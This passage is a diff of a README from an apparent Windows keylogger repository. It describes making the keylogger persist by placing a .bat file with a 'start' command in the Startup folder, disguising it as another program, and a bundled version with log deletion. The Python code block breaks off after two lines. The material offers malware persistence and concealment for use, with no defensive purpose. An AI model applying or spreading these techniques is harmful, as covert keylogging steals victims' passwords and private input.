FingerLeakers/CSL_KeyLogger_Windows/README.md

 <h2>Persistenly Run KeyLogger on Startup:</h2>
 On Windows devices there is a startup folder that determines which applications will run on startup.
 This folder is where some attackers will store their keyloggers, in some cases they will mask it as a another program.
 Essentially this is done by implementing a python function that creates a bat file that runs the <b>'start'</b> command, followed by the file path to the keylogger to execute the program.
 Or a general bat file stored in the startup folder that contains the following script with the commands will work.

-Here is the python function that can be included in the program above which creates the bat file:
+Here is the python function that can be included in the program which creates the bat file.
+(I have included the full program with log deletion and bat startup under "key_log_win_withBATCreation.pyw"):
 <div style="background: #000000; color: #00ff00; overflow: auto; width: auto; border: solid gray; border-width: .1em .1em .1em .8em; padding: .2em .6em;">
 <pre style="margin: 0;">import getpass as gp
 usern = gp.getuser()